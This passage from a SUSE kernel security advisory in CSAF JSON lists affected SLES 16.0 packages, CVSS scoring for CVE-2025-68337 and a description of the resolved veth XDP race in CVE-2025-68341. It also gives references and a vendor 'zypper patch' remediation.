"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68341",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68341"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nveth: reduce XDP no_direct return section to fix race\n\nAs explain in commit fa349e396e48 (\"veth: Fix race with AF_XDP exposing\nold or uninitialized descriptors\") for veth there is a chance after\nnapi_complete_done() that another CPU can manage start another NAPI\ninstance running veth_pool(). For NAPI this is correctly handled as the\nnapi_schedule_prep() check will prevent multiple instances from getting\nscheduled, but for the remaining code in veth_pool() this can run\nconcurrent with the newly started NAPI instance.\n\nThe problem/race is that xdp_clear_return_frame_no_direct() isn\u0027t\ndesigned to be nested.\n\nPrior to commit 401cb7dae813 (\"net: Reference bpf_redirect_info via\ntask_struct on PREEMPT_RT.\") the temporary BPF net context\nbpf_redirect_info was stored per CPU, where this wasn\u0027t an issue. Since\nthis commit the BPF context is stored in \u0027current\u0027 task_struct. When\nrunning veth in threaded-NAPI mode, then the kthread becomes the storage\narea. Now a race exists between two concurrent veth_pool() function calls\none exiting NAPI and one running new NAPI, both using the same BPF net\ncontext.\n\nRace is when another CPU gets within the xdp_set_return_frame_no_direct()\nsection before exiting veth_pool() calls the clear-function\nxdp_clear_return_frame_no_direct().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68341",
"url": "https://www.suse.com/security/cve/CVE-2025-68341"
},
{
"category": "external",
"summary": "SUSE Bug 1255506 for CVE-2025-68341",
"url": "https://bugzilla.suse.com/1255506"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
